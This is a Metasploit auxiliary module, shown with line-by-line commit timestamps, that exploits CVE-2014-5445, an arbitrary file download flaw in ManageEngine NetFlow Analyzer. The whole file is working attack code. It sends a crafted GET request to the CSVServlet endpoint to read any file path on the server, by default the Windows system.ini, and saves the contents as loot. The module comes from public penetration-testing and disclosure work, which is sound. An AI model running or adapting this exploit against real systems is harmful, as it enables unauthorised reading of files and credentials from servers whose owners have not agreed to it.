2014-11-30 00:12:37 +00:00
|
|
|
##
|
2014-12-12 18:49:12 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-11-30 00:12:37 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2014-12-01 00:44:03 +00:00
|
|
|
'Name' => 'ManageEngine NetFlow Analyzer Arbitrary File Download',
|
2014-11-30 00:12:37 +00:00
|
|
|
'Description' => %q{
|
2014-12-01 00:44:03 +00:00
|
|
|
This module exploits an arbitrary file download vulnerability in CSVServlet
|
|
|
|
on ManageEngine NetFlow Analyzer. This module has been tested on both Windows
|
2014-12-18 22:16:02 +00:00
|
|
|
and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you
|
|
|
|
must escape the backslash with a backslash.
|
2014-11-30 00:12:37 +00:00
|
|
|
},
|
2014-12-01 00:44:03 +00:00
|
|
|
'Author' =>
|
2014-11-30 00:12:37 +00:00
|
|
|
[
|
|
|
|
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
|
|
|
|
],
|
2014-12-01 00:44:03 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2014-11-30 00:12:37 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2014-5445' ],
|
2014-12-07 17:54:31 +00:00
|
|
|
[ 'OSVDB', '115340' ],
|
2014-11-30 00:12:37 +00:00
|
|
|
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt' ],
|
2014-12-04 21:32:19 +00:00
|
|
|
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ]
|
2014-11-30 00:12:37 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Nov 30 2014'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(8080),
|
|
|
|
OptString.new('TARGETURI',
|
|
|
|
[ true, "The base path to NetFlow Analyzer", '/netflow' ]),
|
2014-12-18 22:16:02 +00:00
|
|
|
OptString.new('FILEPATH', [true, 'Path of the file to download', 'C:\\windows\\system.ini']),
|
2014-11-30 00:12:37 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
# Create request
|
|
|
|
begin
|
|
|
|
print_status("#{peer} - Downloading file #{datastore['FILEPATH']}")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'),
|
|
|
|
'vars_get' => { 'schFilePath' => datastore['FILEPATH'] },
|
|
|
|
})
|
2014-12-01 00:44:25 +00:00
|
|
|
rescue Rex::ConnectionError
|
2014-11-30 00:12:37 +00:00
|
|
|
print_error("#{peer} - Could not connect.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# Show data if needed
|
|
|
|
if res && res.code == 200
|
|
|
|
if res.body.to_s.bytesize == 0
|
|
|
|
print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
vprint_line(res.body.to_s)
|
|
|
|
fname = File.basename(datastore['FILEPATH'])
|
|
|
|
|
|
|
|
path = store_loot(
|
|
|
|
'netflow.http',
|
|
|
|
'application/octet-stream',
|
|
|
|
datastore['RHOST'],
|
|
|
|
res.body,
|
|
|
|
fname
|
|
|
|
)
|
2014-12-01 00:46:15 +00:00
|
|
|
print_good("#{peer} - File saved in: #{path}")
|
2014-11-30 00:12:37 +00:00
|
|
|
else
|
|
|
|
print_error("#{peer} - Failed to download file.")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|